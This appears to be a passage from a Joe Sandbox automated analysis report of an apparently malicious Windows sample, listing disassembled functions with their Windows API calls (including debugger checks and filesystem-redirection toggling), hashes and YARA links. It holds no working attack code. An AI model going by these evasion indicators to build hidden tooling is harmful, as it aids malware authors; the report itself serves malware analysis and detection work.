                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65e21c04ba691d82f3a98fdd3d20a19955fb3364cb913630bf425a29b3bb702a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE32DF31A00215EBCB14DF54DC81BEEB7B0BF04325F548558EA25EB2A1EB39AD84FB51
                                                                                                                                                                                                                                                                                        Function 00F03A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00F4413B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F03A76
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                        • String ID: X
                                                                                                                                                                                                                                                                                        • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                        • Opcode ID: 79c2aa40279c8035eeda061840272da4211f280dc613ad46d6be57ce349aaceb
                                                                                                                                                                                                                                                                                        • Instruction ID: bf1d4b619a7cd228ad2dcea98296148d01182fdfc97a4bdf24510dbcfdeda1f3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79c2aa40279c8035eeda061840272da4211f280dc613ad46d6be57ce349aaceb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21A571A002589BDF05DF94DC05BEE7BFDAF49314F008019E545B7281DBF89A89AFA1
                                                                                                                                                                                                                                                                                        Function 00F0396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03A3C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c5100bb094e08ff8e16b032d8b5491ba4efbb8325f5f9ea9ab417a62cb19fc95
                                                                                                                                                                                                                                                                                        • Instruction ID: 9c6e29edee473f762bb6500bb194160dcfedb9c445c628a776f7a49c9a2a61ab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5100bb094e08ff8e16b032d8b5491ba4efbb8325f5f9ea9ab417a62cb19fc95
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C31D571A053058FE360DF34D884797BBF8FB59718F00092EE5D997280E7B5A948EB92
                                                                                                                                                                                                                                                                                        Function 00F0331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 00F0333D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F032E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F032FB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F032E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F03312
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F03368,?), ref: 00F033BB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F03368,?), ref: 00F033CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD2418,00FD2400,?,?,?,?,?,?,00F03368,?), ref: 00F0343A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F034BB
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F03377
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c3a8d89d5727d4c0ed294d5991b7f799a836a39575a469cc71a442e1eed901d6
                                                                                                                                                                                                                                                                                        • Instruction ID: 3987d0c9157d3f4c5c175041b8d6f4d38bf3e0435c50f0f99527724f1f769432
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3a8d89d5727d4c0ed294d5991b7f799a836a39575a469cc71a442e1eed901d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65F0823255534CAFD742AF70FD4BB2837A6A710B19F14481BB608860E2CBBE8550BB90
                                                                                                                                                                                                                                                                                        Function 00F1FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                        • Instruction ID: 3fce3e26642e8cca0ed0db71d7fb60c5b44c7f52dd53778ca86a9770a6177132
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8931D772A00116DFE718CF58E490B69FBA5FF49310B2486A5E409CB252DB32EDC1EBC0
                                                                                                                                                                                                                                                                                        Function 00F0CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F0CEEE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 525464f339a4b5ba0131446686bb80a561e37e9bbf8dd28df58677aa8e171d8b
                                                                                                                                                                                                                                                                                        • Instruction ID: 1cdbf209259c9dd388f7e130d7a9892fddcbff46da6374bcebdd96da2f7847c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 525464f339a4b5ba0131446686bb80a561e37e9bbf8dd28df58677aa8e171d8b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A32BD75E002099FDB20DF18C884BBAB7B6FF45320F198169EE15AB291C734AD45FB91
                                                                                                                                                                                                                                                                                        Function 00F87AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                        • Opcode ID: dcbebed32b7298e726512dbc9726c5eb64441a6e307bd14befe56bab2167eafe
                                                                                                                                                                                                                                                                                        • Instruction ID: 719d2dae0b6f1fa4349ba18bc5c1a6052a2a244a9f01b344dd4c1d54de060f2a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcbebed32b7298e726512dbc9726c5eb64441a6e307bd14befe56bab2167eafe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CED14E75E04209DFCB14EF98C881AEDBBB5FF48320F248159E915AB291DB35ED41EB90
                                                                                                                                                                                                                                                                                        Function 00F2F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 41a0813ba0c923be385f5d3dddb6cc56ca54c7a041eb658e3ad532333859f5c4
                                                                                                                                                                                                                                                                                        • Instruction ID: 3fcf2b021deb2abd6cc51bf9b2c8a24fba10d710c53588f622c4fbbfd244b1b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41a0813ba0c923be385f5d3dddb6cc56ca54c7a041eb658e3ad532333859f5c4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9251E535E10128EFDB10DF68EC40BA97BB1EF86364F198178E8189B391C771AD46DB50
                                                                                                                                                                                                                                                                                        Function 00F6FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F6FCCE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9f596db8521f06dba43846fc40605df94626b6fef62115267f35fb571ce5c52f
                                                                                                                                                                                                                                                                                        • Instruction ID: d3fc736485c8f141b0b94b53a835c842e5d0cba0c1b47d3279d2aa2e8ffbe462
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f596db8521f06dba43846fc40605df94626b6fef62115267f35fb571ce5c52f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41A777900209AFCB11DF68DC819AEB7B9EF44324B10453EE516D7291DB70EE05EB50
                                                                                                                                                                                                                                                                                        Function 00F06679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0664A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F0665C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0663E: FreeLibrary.KERNEL32(00000000,?,?,00F0668B,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F0666E
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F066AB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F06607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06610
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F06607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F06622
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F06607: FreeLibrary.KERNEL32(00000000,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06635
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5328b1022ceb09321b9b5239ca49b237414c7a695c0c261a490b7e642dd54b66
                                                                                                                                                                                                                                                                                        • Instruction ID: 848dce30efd50aa4e51453a4ed4dd146c2a146fc84474618281ff7972757aa1a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5328b1022ceb09321b9b5239ca49b237414c7a695c0c261a490b7e642dd54b66
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C110A72640205ABDF14BB20CD02BAD7BA59F50711F20842EF442EA1C2EE7ADA25FB50
                                                                                                                                                                                                                                                                                        Function 00F38782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ce15517bbc04848d22029f17a3bab4c3251207c2717a05a464ed3007ba0cb76
                                                                                                                                                                                                                                                                                        • Instruction ID: c30a966012ee9e9ea897fe9973882b0f6dae9e1d2f6484e3cd45e4322582e149
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ce15517bbc04848d22029f17a3bab4c3251207c2717a05a464ed3007ba0cb76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA115AB290420AAFCF05DF58E940A9E7BF5FF48320F104069F808AB311DA35EA12DB64
                                                                                                                                                                                                                                                                                        Function 00F35373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F34FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00F3319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00F35031
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F353DF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 8b3a914332c3ef83ff4316588991cd974610cde10dfbb0949b27fec803bc7b79
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6701D6726007056BE3218F69DC81A5AFBE9EBC5370F65051DE59483280EA70A9059774
                                                                                                                                                                                                                                                                                        Function 00F2E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                        • Instruction ID: d7b9a0afce60146e386f9e32cfb17e43f525e10bacafb843084332a73177c385
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14F02832501A3057D6313A6AFC01B5A33988F82370F300727F521931D1EB7CE842B6D2
                                                                                                                                                                                                                                                                                        Function 00F0B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
